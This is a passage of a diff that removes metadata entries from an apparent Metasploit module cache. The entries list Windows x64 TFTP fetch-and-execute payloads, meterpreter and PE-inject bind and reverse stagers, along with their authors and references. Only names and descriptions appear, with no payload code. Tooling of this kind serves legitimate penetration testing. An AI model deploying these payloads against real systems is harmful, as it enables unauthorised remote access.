"URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/meterpreter/bind_named_pipe": { - "name": "TFTP Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/tftp/x64/meterpreter/bind_tcp": { - "name": "TFTP Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4": { - "name": "TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid": { - "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_http": { - "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_http", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_https": { - "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_https", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_named_pipe": { - "name": "TFTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_tcp": { - "name": "TFTP Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4": { - "name": "TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid": { - "name": "TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_winhttp": { - "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/tftp/x64/meterpreter/reverse_winhttps": { - "name": "TFTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/tftp/x64/meterpreter_bind_named_pipe": { - "name": "TFTP Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter_bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "UserExistsError", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter_bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", - "staged": false - }, - "payload_cmd/windows/tftp/x64/meterpreter_bind_tcp": { - "name": "TFTP Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter_bind_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/meterpreter_reverse_http": { - "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/windows/tftp/x64/meterpreter_reverse_https": { - "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp": { - "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/meterpreter_reverse_tcp": { - "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/peinject/bind_ipv6_tcp": { - "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid": { - "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/peinject/bind_named_pipe": { - "name": "TFTP Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/tftp/x64/peinject/bind_tcp": { - "name": "TFTP Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/tftp/x64/peinject/bind_tcp_rc4": { - "name": "TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - 